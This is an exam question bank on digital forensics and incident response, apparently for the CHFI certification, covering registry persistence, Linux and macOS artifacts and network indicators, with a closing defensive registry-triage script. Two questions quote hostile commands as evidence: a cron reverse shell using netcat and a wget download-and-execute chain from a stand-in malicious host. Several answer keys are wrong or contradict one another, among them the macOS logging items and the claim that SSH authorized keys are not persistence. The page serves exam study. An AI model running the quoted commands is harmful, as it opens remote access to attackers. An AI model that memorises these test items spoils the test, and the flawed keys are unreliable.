CCNA Chfi Os Network Questions

75 of 216 questions · Page 1/3 · Chfi Os Network topic · Answers revealed

1
Multi-Select · hard

A network security analyst reviews firewall logs and identifies a high volume of outbound DNS queries to a known malicious domain from multiple internal hosts. Which THREE actions should the analyst take immediately?

Select 3 answers
A. Isolate the affected hosts from the network
B. Update antivirus signatures and run a full scan
C. Block the malicious domain at the firewall or DNS level
D. Conduct a forensic analysis of the affected hosts
E. Review DNS logs to identify other potential malicious domains
Answers: A, C, D

Isolation prevents lateral movement and further data exfiltration.

Why this answer

The high volume of DNS queries to a malicious domain indicates possible C2 communication. Immediate actions: block the domain at the firewall/DNS, isolate affected hosts to prevent further spread, and conduct a forensic investigation to understand the infection. Checking antivirus is good but not immediate; logs for later analysis are secondary.

2
Multi-Select · easy

Which TWO of the following are common persistence mechanisms used by malware on Windows systems? (Select two.)

Select 2 answers
A. USBSTOR registry key
B. Prefetch files
C. Scheduled Tasks
D. LNK files
E. Registry Run keys (e.g., HKLM\Software\Microsoft\Windows\CurrentVersion\Run)
Answers: C, E

Correct. Tasks can be set to run malware at specific times.

Why this answer

Run keys in the registry and scheduled tasks are standard persistence techniques. Prefetch and LNK files are forensic artifacts, not persistence mechanisms. USBSTOR tracks devices.

3
MCQ · medium

A Linux system is suspected of being used as a pivot point. An analyst checks /proc/[pid]/fd/ and sees open file descriptors pointing to sockets. Which command would BEST determine the remote connections associated with these sockets?

A. netstat -anp
B. cat /proc/net/tcp
C. ls -la /proc/[pid]/fd/
D. lsof -i
Answer: D

lsof -i lists open network files with remote addresses.

Why this answer

lsof -i shows network connections and listening sockets, including remote addresses. It can read /proc fd info.

4
Multi-Select · easy

Which TWO of the following are tools that can be used for timeline analysis in digital forensics?

Select 2 answers
A. Wireshark
B. Nmap
C. log2timeline
D. FTK Imager
E. Plaso
Answers: C, E

log2timeline is a tool for extracting timeline data from various sources.

Why this answer

log2timeline (option C) is a tool specifically designed for timeline analysis in digital forensics. It parses various log files and artifacts to create a super timeline, which is a comprehensive chronological record of system activity. This allows investigators to correlate events across multiple sources, such as file system timestamps, registry keys, and application logs.

Exam trap

EC-Council often tests the distinction between tools used for network analysis (Wireshark, Nmap) versus tools used for host-based timeline analysis (log2timeline, Plaso), leading candidates to confuse packet capture utilities with forensic timeline generators.

5
Multi-Select · hard

Which TWO of the following registry keys are commonly used to maintain persistence on Windows systems by automatically starting programs?

Select 2 answers
A. HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
B. HKLM\SAM\SAM\Domains\Account\Users
C. HKLM\System\CurrentControlSet\Services
D. HKCU\Software\Microsoft\Windows\CurrentVersion\Run
E. HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
Answers: D, E

Programs listed here run when the current user logs on.

Why this answer

The Run key under both HKCU and HKLM is a standard autorun location. The RunOnce key also starts programs but runs them once at next logon.

6
MCQ · medium

During a forensic investigation of a compromised Linux server, an analyst checks /var/log/auth.log and finds multiple entries like "Failed password for root from 10.0.0.5 port 22 ssh2". Which tool is BEST suited to analyze the timeline of these events?

A. Nmap
B. Wireshark
C. log2timeline
D. Autopsy
Answer: C

log2timeline is the standard tool for creating super timelines from log files.

Why this answer

log2timeline (part of Plaso) is designed for timeline analysis of log files, including auth.log. It parses and correlates timestamps.

7
Multi-Select · medium

A forensic analyst is examining a Mac system for evidence of malicious activity. Which THREE artifacts are commonly analyzed in macOS forensics?

Select 3 answers
A. Prefetch files
B. bash_history
C. Unified logging
D. FSEvents
E. .plist files
Answers: C, D, E

Unified logging captures system and application logs in a centralized database.

Why this answer

macOS forensics frequently examines unified logs (for system events), .plist files (for configuration and application data), and FSEvents (for file system change history). bash_history is not the default for macOS (zsh is default). Prefetch files are Windows-only.

8
MCQ · medium

An incident responder finds the following entry in a Linux cron job: "*/5 * * * * root nc -e /bin/sh 10.0.0.5 4444". What is the purpose of this cron job?

A. Port scan 10.0.0.5 every 5 minutes
B. Establish a reverse shell back to the attacker every 5 minutes
C. Log system activity to a remote server
D. Download malicious software from 10.0.0.5
Answer: B

The -e option executes a program (shell) and connects its I/O to the socket, giving the attacker remote access.

Why this answer

This cron job uses netcat (nc) with the -e option to execute a shell (/bin/sh) and connect back to IP 10.0.0.5 on port 4444, creating a reverse shell. It runs every 5 minutes.

9
MCQ · medium

During a forensic investigation of a compromised Linux server, the investigator examines the bash_history file of the root user. She finds the command: wget http://malicious.site/shell.sh && chmod +x shell.sh && ./shell.sh. What is the MOST likely intent of this command sequence?

A. Download and execute a web shell for persistent remote access
B. Compile a kernel module
C. Update the system packages
D. Perform a system backup to a remote server
Answer: A

This sequence downloads a shell script and executes it, which is a common method to install a backdoor.

Why this answer

The commands download a shell script, make it executable, and run it. This is typical of a web shell download and execution, providing remote access to the attacker.

10
MCQ · hard

A forensic analyst recovers a USB device from a suspect's computer. Which Windows registry key should be examined to determine the first time the USB device was connected?

A. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB
B. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
C. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR
D. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
Answer: C

Tracks USB storage devices and their first/last connect times.

Why this answer

The USBSTOR key records serial numbers and first/last connection times for USB storage devices.

11
MCQ · easy

Which Windows Event ID is generated when a service is installed on a system?

A. 4624
B. 7045
C. 4688
D. 4720
Answer: B

7045 is specifically for service installation.

Why this answer

Event ID 7045 is logged when a new service is installed on a Windows system, providing details such as service name, binary path, and account.

12
MCQ · hard

During a network forensics investigation, an analyst reviews NetFlow data and notices a one-way flow of UDP traffic from an internal host to an external IP on port 53. However, the packet capture shows the external IP responding with large DNS responses. What type of data exfiltration technique is MOST likely being used?

A. ICMP tunneling
B. DNS tunneling
C. SSH tunneling
D. HTTP tunneling
Answer: B

DNS tunneling uses DNS queries/responses to exfiltrate data, often with large responses.

Why this answer

DNS tunneling involves encoding data in DNS queries and responses. The one-way flow observation might be due to NetFlow's view, but the large responses suggest data being returned via DNS responses.

13
MCQ · easy

In network forensics, which tool is specifically designed for packet capture and analysis, allowing examiners to inspect individual packets and reconstruct network conversations?

A. Tcpdump
B. Netstat
C. Nmap
D. Wireshark
Answer: D

Wireshark is a network protocol analyzer that captures and interactively browses traffic.

Why this answer

Wireshark is the industry-standard tool for packet capture and analysis, providing deep inspection of hundreds of protocols.

14
MCQ · hard

During a forensic investigation, you find a prefetch file created at 03:15:22 UTC on the system. The corresponding executable's last modified timestamp is 02:30:00 UTC, and the system date/time shows a discrepancy of +5 minutes. What is the MOST accurate interpretation regarding the file execution time?

A. The program was executed at 02:30:00 UTC.
B. The program was executed at 03:15:22 UTC.
C. Execution time cannot be determined from prefetch files alone.
D. The program was executed at 03:10:22 UTC after adjusting for clock skew.
Answer: B

Prefetch file creation time is recorded when the program first runs, so 03:15:22 UTC is the execution start time (assuming the clock is accurate). The +5 minute discrepancy means the system time was ahead, but the UTC value is correct.

Why this answer

Prefetch files record the time the program was first run. The last modified timestamp of the executable is not directly related to execution time. The prefetch timestamp is the best indicator of first execution, but time zone and clock skew must be considered.

However, the question asks for the MOST accurate interpretation among the options; the prefetch file creation time directly records when the program was first executed, making that the execution time.

15
MCQ · medium

During a Mac OS X forensic investigation, an analyst wants to review user application usage and system events for the last week. Which artifact provides a centralized, binary log of these activities?

A. .plist files in ~/Library/Preferences
B. Unified logging (log stream)
C. Quick Look server logs
D. FSEvents files in /.fseventsd
Answer: D

FSEvents records file system changes with timestamps and can be parsed for forensic timeline.

Why this answer

FSEvents is a macOS feature that logs file system events in a binary format, useful for tracking file creation, modification, and deletion.

16
MCQ · medium

During a network forensic investigation, an analyst examines a pcap file and finds multiple TCP SYN packets sent to a target IP on port 80, each from a different source IP address. No SYN-ACK packets are returned, but the target continues to send SYN-ACK responses for earlier packets. What attack is MOST likely occurring?

A. UDP flood attack
B. SYN flood attack
C. ARP spoofing attack
D. DNS amplification attack
Answer: B

Multiple SYN packets from varied sources, no subsequent ACKs, and target still responding indicate SYN flood.

Why this answer

A SYN flood attack sends many SYN packets without completing the handshake, exhausting the target's connection queue. The different source IPs indicate a distributed SYN flood or IP spoofing.

17
MCQ · hard

A forensic examiner is analyzing a compromised Linux system and finds a suspicious cron job in /var/spool/cron/crontabs/root that executes a script every hour. The script is located in /tmp/.hidden/update.sh. What is the BEST next step?

A. Reboot the system to clear the cron job from memory
B. Capture the script for analysis and preserve the cron entry as evidence
C. Delete the cron job immediately to prevent further damage
D. Run the script in a sandbox to determine its functionality
Answer: B

Forensic soundness requires collecting and analyzing the script without altering the system.

Why this answer

The cron job is a persistence mechanism. The examiner should capture the script and analyze it to understand the attacker's actions, preserving the file as evidence.

18
Multi-Select · hard

Which THREE of the following are persistence mechanisms that can be used on Linux systems?

Select 3 answers
A. Prefetch files
B. SSH authorized keys
C. Startup scripts in /etc/init.d
D. Cron jobs
E. Modifications to /etc/passwd to add new users
Answers: C, D, E

Scripts in init.d run at system startup.

Why this answer

Cron jobs, startup scripts in /etc/init.d, and modifications to /etc/passwd to create backdoor accounts are all persistence techniques on Linux. SSH keys are not a persistence mechanism but rather an access method.

19
MCQ · medium

During a network breach investigation, an analyst examines NetFlow records and sees large data transfers from a server to an external IP address during off-hours. Which type of activity does this MOST likely indicate?

A. Normal software update download
B. Scheduled backup to a cloud service
C. Data exfiltration by an attacker
D. Denial-of-service attack against the server
Answer: C

Large off-hours transfers to external IPs are a classic exfiltration indicator.

Why this answer

Large off-hours data transfers to an external IP are typical of data exfiltration. Normal backup traffic may occur but is usually scheduled and to known destinations.

20
Multi-Select · medium

Which TWO of the following are Windows artifacts that can provide evidence of file execution, including timestamps and paths?

Select 2 answers
A. Event ID 4720
B. SAM registry hive
C. Prefetch files (*.pf)
D. Pagefile.sys
E. LNK files
Answers: C, E

Prefetch files are created when an application is run and contain execution information.

Why this answer

Prefetch files store information about recently executed programs, and LNK files (shortcuts) record execution details including timestamps and target paths.

21
MCQ · easy

A security analyst investigates a Windows system and finds an event with ID 4625 in the Security log. What does this event indicate?

A. A failed logon attempt
B. A successful user logon
C. A service was installed
D. A new user account was created
Answer: A

4625 is the event ID for failed logon.

Why this answer

Event ID 4625 indicates a failed logon attempt. This is a standard Windows security event used to track authentication failures.

22
MCQ · medium

In a Windows forensic investigation, which registry key is used to examine programs that automatically start at system boot for all users?

A. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
B. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
C. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
D. NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run
Answer: C

Correct: This key runs programs for all users at boot.

Why this answer

Run keys under HKLM\Software\Microsoft\Windows\CurrentVersion\Run configure programs to start automatically for all users. The HKCU equivalent is per-user.

23
MCQ · hard

A forensic examiner recovers a Windows 10 system and finds a prefetch file for powershell.exe with a last run time of 3 days ago, but the system's security logs show no interactive logons from that user. What does this discrepancy suggest?

A. PowerShell was executed as part of a scheduled task or service
B. The prefetch file is corrupted
C. The user deleted their profile
D. The system clock was changed
Answer: A

Non-interactive execution (logon type 3, 4, or 5) won't show interactive logon events.

Why this answer

Prefetch files record execution times. If PowerShell ran but there was no interactive logon, it most likely ran via a scheduled task or service, which does not create an interactive logon event (Event ID 4624 with logon type 2).

24
MCQ · easy

Which Windows Event ID is generated when a new service is installed on a system?

A. 4624
B. 7045
C. 4648
D. 4720
Answer: B

7045 is service installation.

Why this answer

Event ID 7045 in the System log indicates a service was installed on the system.

25
MCQ · easy

Which tool is specifically designed for timeline analysis in digital forensics and is the command-line version of the log2timeline framework?

A. Autopsy
B. Sleuth Kit
C. Plaso
D. Wireshark
Answer: C

Plaso (log2timeline) is the command-line tool for creating super timelines.

Why this answer

Plaso (Python Log2Timeline) is the command-line tool for creating super timelines from various forensic artifacts.

26
MCQ · easy

An analyst captures network traffic during an incident and wants to extract files transferred over HTTP. Which Wireshark feature is BEST suited for this task?

A. Follow TCP Stream
B. Statistics > HTTP
C. Export Objects > HTTP
D. Analyze > Expert Info
Answer: C

This extracts files transferred via HTTP from the capture.

Why this answer

Wireshark's 'Export Objects' feature allows extraction of files transferred via HTTP, SMB, etc. 'Follow TCP Stream' shows the stream content but does not export files.

27
Multi-Select · hard

Which THREE of the following are common indicators of a web shell on a compromised web server? (Select THREE.)

Select 3 answers
A. Presence of .htaccess files with rewrite rules
B. Files with obfuscated code (e.g., base64 encoded strings)
C. Files located in web-accessible directories (e.g., /uploads) with execute permissions
D. High number of 404 errors in access logs
E. Unusual HTTP POST requests with large payloads to a single script
Answers: B, C, E

Obfuscation is used to hide malicious functionality from security tools.

Why this answer

Web shells often contain obfuscated code, are placed in web-accessible directories, and may be accessed via unusual HTTP methods like POST with encoded payloads.

28
MCQ · easy

Which Windows Event ID is generated when a new service is installed on a system, and is often used by malware to establish persistence?

A. 4624
B. 4648
C. 7045
D. 4720
Answer: C

7045 is the event ID for service installation, commonly used by malware for persistence.

Why this answer

Event ID 7045 logs the installation of a new service, including service name, image path, and start type. Malware often creates services to achieve persistence.

29
MCQ · easy

Which Windows registry hive stores user-specific configuration and is loaded when a user logs in, containing artifacts such as recently accessed files and application settings?

A. SECURITY
B. NTUSER.DAT
C. HKLM\SAM
D. SYSTEM
Answer: B

NTUSER.DAT is loaded into HKEY_CURRENT_USER and contains user preferences and activity artifacts.

Why this answer

NTUSER.DAT is the registry hive that contains user-specific settings and is loaded into HKEY_CURRENT_USER upon logon. It includes UserAssist, MRU lists, and other user activity artifacts.

30
MCQ · hard

An analyst is examining a PCAP file in Wireshark and notices a series of TCP SYN packets sent to multiple ports on a single IP address, with no subsequent SYN-ACK replies. What type of network activity does this indicate?

A. A denial of service attack
B. A man-in-the-middle attack
C. A TCP handshake for normal connection establishment
D. A port scan attempting to identify open ports
Answer: D

This is characteristic of a SYN scan, where the scanner sends SYN packets and waits for SYN-ACKs from open ports.

Why this answer

Sending SYN packets to many ports without receiving SYN-ACKs indicates a port scan, likely a TCP SYN scan, to discover open ports.

31
MCQ · easy

In network forensics, which type of log is BEST for identifying all outbound connections from internal hosts to external IP addresses on specific ports?

A. Firewall logs
B. IDS logs
C. Proxy logs
D. NetFlow logs
Answer: A

Firewall logs capture all traffic passing through the firewall, including outbound connections.

Why this answer

Firewall logs record allowed and denied traffic, including source/destination IP and port, ideal for tracking outbound connections.

32
MCQ · medium

A forensics investigator finds a suspicious LNK file on a Windows system that points to a script located on a remote share. What is the PRIMARY forensic significance of this LNK file?

A. It is evidence of USB device insertion.
B. It may be part of a lateral movement technique using remote execution.
C. It shows the user's recently accessed files.
D. It is a prefetch artifact indicating the script was executed.
Answer: B

An LNK file pointing to a remote script is often used in attacks like PsExec or scheduled tasks to move laterally.

Why this answer

LNK files can be used for persistence or lateral movement. A shortcut to a remote script could indicate the system is configured to run a malicious script from another machine, potentially for propagation.

33
MCQ · hard

During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 03:14:15 server sshd[1234]: Accepted publickey for root from 10.0.0.5 port 54321 ssh2: RSA SHA256:AbCdEf123456'. Which artifact should you examine next to determine if unauthorized key-based access occurred?

A. /var/log/syslog
B. /etc/ssh/sshd_config
C. ~/.ssh/authorized_keys
D. /etc/passwd
Answer: C

This file lists public keys permitted to authenticate as root. Checking its contents can reveal unauthorized keys.

Why this answer

The log shows acceptance of a public key. To determine if the key was unauthorized, you must examine the authorized_keys file for root (~/.ssh/authorized_keys) to see if the key was added maliciously.

34
MCQ · hard

A forensic analyst is investigating a Windows 10 system and needs to determine if a USB device was ever connected. Which registry key would provide a comprehensive list of USB devices that have been attached, including the first and last connection times?

A. HKLM\SYSTEM\CurrentControlSet\Enum\USB
B. HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
C. HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
D. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\PnpLockdownFiles
Answer: B

USBSTOR lists all USB storage devices with first/last connection times under Properties.

Why this answer

The USBSTOR key records all USB storage devices with timestamps. Enum/USB contains device descriptors but not timestamps. SetupAPI logs are in a different location.

35
MCQ · hard

During a forensic analysis of a compromised Linux system, you notice that the /proc filesystem contains a suspicious entry /proc/12345/exe pointing to /tmp/.hidden/malware. What conclusion can you draw?

A. The system was rebooted recently
B. The malware is a kernel module
C. A process with PID 12345 is running the malware
D. The malware was executed via a cron job
Answer: C

/proc/12345/exe points to the actual executable; a hidden location indicates malicious activity.

Why this answer

/proc/[pid]/exe is a symbolic link to the executable of a running process. The entry indicates a process with PID 12345 is running from a hidden file in /tmp, strongly suggesting malware execution.

36
MCQ · medium

During a Linux forensic investigation, you find the following entry in /var/log/auth.log: "Accepted publickey for root from 203.0.113.5 port 54321 ssh2: RSA SHA256:abc...". The user claims they never connect from that IP. Which forensic artifact should you examine next to confirm unauthorized access?

A. bash_history for suspicious commands
B. /etc/shadow for recent modifications
C. ~/.ssh/authorized_keys for unauthorized keys
D. /var/log/syslog for cron job entries
Answer: C

Unauthorized SSH keys are often added in authorized_keys; this file should be examined for unknown entries.

Why this answer

The presence of an authorized key from an unknown IP suggests an attacker added their public key. Checking ~/.ssh/authorized_keys on the affected account will reveal any unauthorized keys.

37
MCQ · easy

A security analyst reviews Windows Security Event Log and notices multiple Event ID 4625 entries for a single user account from various IP addresses within a short time frame. What is the MOST likely attack being attempted?

A. Brute-force password attack
B. Kerberos golden ticket attack
C. ARP spoofing attack
D. Pass-the-hash attack
Answer: A

Multiple failed logons from different sources suggest systematic password guessing.

Why this answer

Event ID 4625 indicates a failed logon attempt. Multiple failures for one account from different IPs in a short period are characteristic of a brute-force password guessing attack.

38
Multi-Select · hard

A forensic analyst is examining a network packet capture for signs of data exfiltration. Which THREE of the following are common indicators of data exfiltration over DNS? (Select three.)

Select 3 answers
A. Low TTL values in DNS responses
B. DNS queries sent to multiple different DNS servers
C. DNS responses with unusually large payloads (e.g., TXT records)
D. High volume of DNS queries to a single domain
E. DNS queries for random-looking subdomains
Answers: C, D, E

Large response sizes can indicate data being encoded in DNS responses.

Why this answer

DNS exfiltration often uses high query volumes, unusual domain names, and large TXT records.

39
Multi-Select · medium

Which TWO of the following are forensic artifacts found on macOS systems that can help reconstruct user activity?

Select 2 answers
A. .plist files
B. Unified logging
C. Prefetch files (*.pf)
D. Registry hive files
E. Event ID 4624
Answers: A, B

Property list files store configuration and usage data for applications.

Why this answer

Unified logging captures detailed system and user activity logs, and .plist files store application preferences and usage data. Both are valuable for reconstructing user actions.

40
Multi-Select · hard

Which THREE of the following are indicators of a webshell compromise on a web server?

Select 3 answers
A. High CPU usage from web server processes
B. Regular successful logins to the server with correct credentials
C. Presence of files with extensions like .php, .asp, or .jsp in web directories that are not part of the original application
D. Unexpected outbound connections from the web server to unknown IP addresses
E. Decrease in network traffic
Answers: A, C, D

Execution of arbitrary commands or scripts can spike CPU usage.

Why this answer

Unusual files in web directories, high CPU usage due to command execution, and unexpected outbound traffic are common signs of a webshell compromise. Log entries with 'cmd' parameter are also typical.

41
MCQ · medium

An analyst reviews NetFlow logs and sees a single internal host communicating with multiple external IPs on port 53 (DNS) over a short period, with each session transferring approximately 1500 bytes. What suspicious activity might this indicate?

A. DNS tunneling for data exfiltration
B. A DNS amplification attack
C. Dynamic DNS update attempts
D. Normal DNS resolution for web browsing
Answer: A

Correct. The pattern matches DNS tunneling.

Why this answer

DNS tunneling often uses small DNS queries/responses to exfiltrate data or establish C2. The consistent small packet size and many external destinations are indicators.

42
MCQ · medium

A security team detects a suspicious process that writes to the Windows registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. What is the MOST likely purpose of this activity?

A. Clearing browser history
B. Establishing persistence for malware
C. Updating system time
D. Configuring firewall rules
Answer: B

The Run key launches programs at user logon, commonly used for persistence.

Why this answer

The Run key is a common auto-start location used for persistence. Writing to it ensures the process executes at user logon.

43
MCQ · hard

During an incident response on a Linux server, you find the following entry in /var/log/auth.log: "Mar 10 12:34:56 server sshd[1234]: Failed password for root from 10.0.0.5 port 34567 ssh2". Which of the following is the BEST immediate action to prevent further unauthorized access?

A. Block the IP address 10.0.0.5 at the firewall
B. Edit /etc/ssh/sshd_config to set PermitRootLogin no and PasswordAuthentication no, then restart sshd
C. Delete the root user account
D. Change the root password to a complex password
Answer: B

This disables root SSH login and password authentication, forcing key-based authentication, which mitigates brute-force attacks.

Why this answer

The log shows a failed SSH login attempt for root from an external IP. The most effective immediate action is to change the SSH configuration to disable root login and allow key-based authentication only (PasswordAuthentication no), then restart the service. This blocks password guessing attacks on root.

44
MCQ · hard

During a forensic analysis of a Linux system, the investigator finds that the bash_history file is empty for the root user. However, the system has been used actively. What is the MOST likely explanation?

A. The system was shut down improperly
B. The file is corrupted
C. The user deleted the history
D. The HISTSIZE environment variable is set to 0 or the history file is redirected to /dev/null
Answer: D

Setting HISTSIZE=0 disables history; redirecting to /dev/null discards entries.

Why this answer

If HISTSIZE is set to 0 or the history file is a symlink to /dev/null, commands are not recorded. This is common in forensic evasion.

45
MCQ · medium

Which tool is commonly used for timeline analysis in digital forensics, allowing examiners to parse and correlate timestamps from various artifacts?

A. log2timeline
B. Sleuth Kit
C. Nmap
D. Wireshark
Answer: A

log2timeline/Plaso is the forensic tool for creating timelines from multiple artifacts.

Why this answer

log2timeline (and its successor Plaso) is the standard tool for timeline analysis, parsing artifacts into a super timeline.

46
MCQ · hard

A forensic analyst examines a Mac system and runs "log show --predicate 'eventMessage contains "disk"' --last 1h" in Terminal. This command extracts Unified Log entries related to disk activity. Which macOS forensic artifact is the analyst MOST likely querying?

A. .plist files
B. FSEvents
C. Core Storage logs
D. Apple Unified Logging
Answer: D

The 'log show' command retrieves entries from the unified logging system, which encompasses system and user activity logs.

Why this answer

The 'log show' command with --predicate queries the Apple Unified Logging system, which centralizes logs from various subsystems.

47
MCQ · easy

In network forensics, an analyst captures traffic and sees a large number of ICMP echo requests from 10.0.0.1 to 10.0.0.2 with varying payload sizes. What is the most likely scenario?

A. Network reconnaissance (ping sweep)
B. A man-in-the-middle attack
C. A DoS attack using ICMP floods
D. A DNS amplification attack
Answer: A

Ping sweeps use ICMP echo requests to multiple hosts to identify live systems.

Why this answer

Large numbers of ICMP echo requests (pings) with varying payload sizes are characteristic of a ping sweep or network reconnaissance to identify live hosts.

48
MCQ · easy

In a macOS forensic investigation, which log system stores high-level events such as application launches and authentication attempts in a binary format, and can be queried using the 'log' command?

A. system.log
B. Audit log
C. FSEvents
D. Unified logging
Answer: D

Unified logging is the current macOS logging system.

Why this answer

Unified logging (os_log) is the modern macOS logging system, storing events in a binary format and queried via the 'log' command.

49
MCQ · medium

During a Linux forensic investigation, you find a suspicious cron job in /etc/cron.d/malware that runs every 5 minutes as root. Which persistence mechanism is being used?

A. Bash history
B. Systemd service
C. Cron job
D. Init script
Answer: C

Cron jobs are scheduled tasks; entries in /etc/cron.d/ run at specified intervals.

Why this answer

Cron jobs are a common Linux persistence mechanism. Entries in /etc/cron.d/ are system-wide cron jobs that execute at scheduled intervals.

50
MCQ · medium

A forensic analyst is examining a Windows 10 system and finds suspicious activity. Which registry hive contains user-specific configuration data that can reveal evidence of recent file access through ShellBags, UserAssist, and MRU lists?

A. HKLM\SYSTEM
B. HKLM\SAM
C. HKLM\SOFTWARE
D. NTUSER.DAT
Answer: D

NTUSER.DAT is the user hive loaded under HKCU, containing ShellBags, UserAssist, MRU, and other user activity traces.

Why this answer

NTUSER.DAT is the user-specific registry hive loaded under HKCU, containing ShellBags, UserAssist, MostRecentlyUsed (MRU) lists, and other user activity artifacts. SAM stores local account hashes, SYSTEM stores system-wide config, and SOFTWARE stores installed applications info.

51
MCQeasy

Which Windows Registry hive is primarily used to store user-specific application settings and recently accessed files?

A.HKU\.DEFAULT
B.HKLM\SYSTEM
C.HKLM\SAM
D.NTUSER.DAT
AnswerD

NTUSER.DAT is the user-specific hive for settings and recent items.

Why this answer

NTUSER.DAT is the registry hive that contains user-specific settings, including MRU lists and application preferences.

52
Multi-Selectmedium

A forensic analyst is investigating a Windows system for evidence of malware persistence. Which TWO registry locations are commonly used by malware to automatically execute on system startup?

Select 2 answers
A.HKLM\SAM
B.C:\Windows\Prefetch
C.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellBags
D.HKLM\SYSTEM\CurrentControlSet\Services
E.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
AnswersD, E

Services subkeys can be configured to start automatically, used by malware for persistence.

Why this answer

Run and RunOnce keys (HKCU and HKLM\Software\Microsoft\Windows\CurrentVersion\Run) launch their values at logon. HKLM\SYSTEM\CurrentControlSet\Services holds one subkey per service; a subkey whose Start value is 2 (automatic), or 0 or 1 for drivers, launches its ImagePath at boot without any user logging on, which is why a new service (Event ID 7045) is a classic persistence indicator. The SAM hive stores password hashes, not startup entries; Prefetch is a directory of execution records, not a registry location; and ShellBags record folder views, not autostart.

When reviewing either location, compare each entry's command line or ImagePath against where such binaries normally live: anything launched from %TEMP%, Users\Public or a user-profile directory deserves a second look.
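
The triage step the explanation above describes, as an added Python example (not code from this page): it parses the text of a Registry export (regedit's .reg format, including the hex(2) continuation lines regedit uses for REG_EXPAND_SZ ImagePath values), lists Run-key values and services whose Start value means automatic, and flags commands launched from directories where autostart binaries rarely belong. The export text, key names and paths in SAMPLE_REG are constructed for illustration; the directory heuristic in SUSPICIOUS_DIRS is an assumption to be tuned per environment.

```python
"""Added example: triage a Registry export (.reg text) for autostart entries.
SAMPLE_REG is constructed for illustration; its paths are assumptions."""
import re
from typing import Dict, List, Tuple

RUN_KEYS = {
    r"HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN",
    r"HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE",
}
SERVICES_PREFIX = "HKEY_LOCAL_MACHINE\\SYSTEM\\CURRENTCONTROLSET\\SERVICES\\"
AUTOSTART_VALUES = {"0", "1", "2"}        # Start: 0 boot, 1 system, 2 automatic
SUSPICIOUS_DIRS = ("\\temp\\", "\\users\\public\\")   # heuristic, assumption

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler]
"Start"=dword:00000002
"ImagePath"="%SystemRoot%\\System32\\spoolsv.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SysHelper]
"Start"=dword:00000002
"ImagePath"=hex(2):43,00,3a,00,5c,00,54,00,65,00,6d,00,70,00,5c,00,78,00,2e,\
  00,65,00,78,00,65,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Bluetooth]
"Start"=dword:00000003
"ImagePath"="C:\\Temp\\bt.exe"
"""


def decode_value(value: str) -> str:
    """Decode the common .reg value encodings into a printable string."""
    if value.startswith('"') and value.endswith('"'):
        return value[1:-1].replace("\\\\", "\\").replace('\\"', '"')
    if value.startswith("dword:"):
        return str(int(value[6:], 16))
    m = re.match(r"hex(?:\((\d+)\))?:(.*)", value)
    if m:
        data = bytes(int(b, 16) for b in m.group(2).split(",") if b)
        if m.group(1) in ("2", "7"):          # REG_EXPAND_SZ / REG_MULTI_SZ are UTF-16LE
            return data.decode("utf-16-le").rstrip("\x00")
        return data.hex()
    return value


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Return {key_path: {value_name: decoded_value}} from .reg export text."""
    text = re.sub(r",\\\r?\n\s*", ",", text)   # join hex(...) continuation lines
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        name, _, value = line.partition("=")
        name = "(Default)" if name == "@" else name.strip('"')
        keys[current][name] = decode_value(value.strip())
    return keys


def looks_suspicious(cmd: str) -> bool:
    low = cmd.lower()
    return any(d in low for d in SUSPICIOUS_DIRS)


def triage(keys: Dict[str, Dict[str, str]]) -> List[Tuple[str, str, str, bool]]:
    """List (kind, name, command, suspicious) for Run values and autostart services."""
    findings = []
    for path, values in keys.items():
        upper = path.upper()
        if upper in RUN_KEYS:
            for name, cmd in values.items():
                findings.append(("Run", name, cmd, looks_suspicious(cmd)))
        elif upper.startswith(SERVICES_PREFIX) and values.get("Start") in AUTOSTART_VALUES:
            image = values.get("ImagePath", "")
            findings.append(("Service", path.rsplit("\\", 1)[1], image, looks_suspicious(image)))
    return findings


if __name__ == "__main__":
    for kind, name, cmd, bad in triage(parse_reg(SAMPLE_REG)):
        print(f"{'!!' if bad else '  '} {kind:8} {name:12} {cmd}")
```

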